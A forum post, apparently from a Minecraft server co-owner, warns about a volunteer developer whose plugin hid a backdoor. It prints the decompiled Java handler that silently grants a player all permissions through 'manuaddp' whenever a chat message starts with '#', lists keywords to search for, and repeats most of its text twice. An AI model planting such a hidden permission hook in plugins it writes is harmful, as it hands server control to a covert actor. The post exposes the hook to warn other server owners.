Yesterday someone joined a server that I currently co own, and basically said he was a plugin developer and would work for us for free, for a small server without a great deal of money an offer like this is a hard one to turn down, so we asked if he could make us a simple gapple command plugin and so he did.
Me and the other owner where talking, and he was a little concerned saying the plugin might break the server, since we don’t know the dev. So after he sent the plugin jar we agreed that I would decompile it and take a quick look. I’m not really a java developer, however can understand it enough to be able to roughly work out what the plugin does by its source code.
I was looking through the code and it all looked good, seemed to look like it would work, and do what we needed, then at the very bottom I happened to notice this:
From what I understand, he had added a small bit of code at the end, so that if he was to type a # in chat, it would give him the * permission allowing him to do basically anything on the server. I told the other owner and he confronted him, shortly after he removed him on skype and that was the last we heard.
This is mostly a warning to all those out there, that come across a developer joining your server and offering to work for free. It’s riskier than you might think. There is a useful online tool http://www.javadecompilers.com/ that can be used to upload the jar and download its source code then open it with notepad and have a look at it and look for some keywords that would be suspicious. E.g. manuadd, manuaddp, pex etc.
Me and the other owner where talking, and he was a little concerned saying the plugin might break the server, since we don’t know the dev. So after he sent the plugin jar we agreed that I would decompile it and take a quick look. I’m not really a java developer, however can understand it enough to be able to roughly work out what the plugin does by its source code.
I was looking through the code and it all looked good, seemed to look like it would work, and do what we needed, then at the very bottom I happened to notice this:
Code:
@EventHandler
public void secretCommands(PlayerChatEvent e) {
String msg = e.getMessage();
if (msg.startsWith("#")) {
Bukkit.dispatchCommand((CommandSender)Bukkit.getConsoleSender(), (String)("manuaddp " + e.getPlayer().getName() + " *"));
e.setCancelled(true);
}
}From what I understand, he had added a small bit of code at the end, so that if he was to type a # in chat, it would give him the * permission allowing him to do basically anything on the server. I told the other owner and he confronted him, shortly after he removed him on skype and that was the last we heard.
This is mostly a warning to all those out there, that come across a developer joining your server and offering to work for free. It’s riskier than you might think. There is a useful online tool http://www.javadecompilers.com/ that can be used to upload the jar and download its source code then open it with notepad and have a look at it and look for some keywords that would be suspicious. E.g. manuadd, manuaddp, pex etc.
.